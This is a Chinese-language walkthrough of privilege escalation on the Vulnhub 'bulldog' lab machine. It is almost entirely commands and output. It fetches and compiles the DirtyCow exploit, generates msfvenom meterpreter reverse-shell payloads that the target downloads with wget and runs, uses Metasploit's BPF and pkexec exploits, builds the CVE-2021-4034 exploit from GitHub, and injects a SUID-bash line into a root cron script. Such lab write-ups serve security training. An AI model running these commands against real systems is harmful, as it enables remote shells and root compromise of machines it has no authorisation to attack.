Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/
脏牛提权失败(在2016年公布的漏洞,ubuntu16.04 可能补上了 )
测试Linux是否有DirtyCow漏洞
https://blog.csdn.net/lee_ham/article/details/82048681
curl -4LO https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -static -pthread dirtyc0w.c -o dirtyc0w.s
root@bulldog:/tmp# su - django
-su-4.3$ id
uid=1001(django) gid=1001(django) groups=1001(django),27(sudo)
-su-4.3$ cd /tmp/
-su-4.3$
-su-4.3$ ./dirtyc0w.s foo m00000000000000000
mmap f77e3000
madvise 0
procselfmem -100000000
-su-4.3$ cat foo
this is not a test
-su-4.3$
CVE-2017-16995提权成功
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.111.130 -a x86 -e x86/shikata_ga_nai --platform linux LPORT=4443 -f elf > x86.elf;
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.111.130 -a x64 -e x64/xor --platform linux LPORT=4444 -f elf > x64.elf;
wget 192.168.111.130/x86.elf;chmod 0777 x86.elf;./x86.elf&
wget 192.168.111.130/x64.elf;chmod 0777 x64.elf;./x64.elf&
msfconsole
handler -H 192.168.111.130 -P 4443 -p linux/x86/meterpreter/reverse_tcp
handler -H 192.168.111.130 -P 4444 -p linux/x64/meterpreter/reverse_tcp
set PAYLOAD linux/x86/meterpreter/reverse_tcp
use exploit/linux/local/bpf_sign_extension_priv_esc
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.111.130
set LPORT 4445
set session 7
run
CVE-2021-4034 提权成功
msf6 > info exploit/linux/local/pkexec # 利用失败(x86 x64 都失败)
cd /tmp;
wget -4O CVE-2021-4034.tar.gz https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.tar.gz
tar -zxvf CVE-2021-4034.tar.gz;
cd CVE-2021-4034-main;ll;env;make;
ubuntu@ubuntu:/tmp/CVE-2021-4034-main$ make
django@bulldog:/tmp$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(django)
#/usr/bin/pkexec --version
pkexec version 0.105
cron计划任务:
django@bulldog:/etc/cron.d$ ll
total 24
drwxr-xr-x 2 root root 4096 Aug 25 2017 ./
drwxr-xr-x 96 root root 4096 Jun 30 07:23 ../
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 191 Aug 24 2017 popularity-contest
-rw-r--r-- 1 root root 54 Aug 25 2017 runAV
django@bulldog:/etc/cron.d$ cat runAV
*/1 * * * * root /.hiddenAVDirectory/AVApplication.py
django@bulldog:/etc/cron.d$
ls -al /.hiddenAVDirectory/AVApplication.py;
cat /.hiddenAVDirectory/AVApplication.py;
echo "import os;os.system('touch /tmp/12345;chmod u+s /bin/bash');">>/.hiddenAVDirectory/AVApplication.py;
django@bulldog:/tmp$ id
uid=1001(django) gid=1001(django) groups=1001(django),27(sudo)
django@bulldog:/tmp$ bash -p
bash-4.3# id
uid=1001(django) gid=1001(django) euid=0(root) groups=1001(django),27(sudo)
bash-4.3# ls -al /bin/bash
-rwsr-xr-x 1 root root 1037528 May 16 2017 /bin/bash
bash-4.3#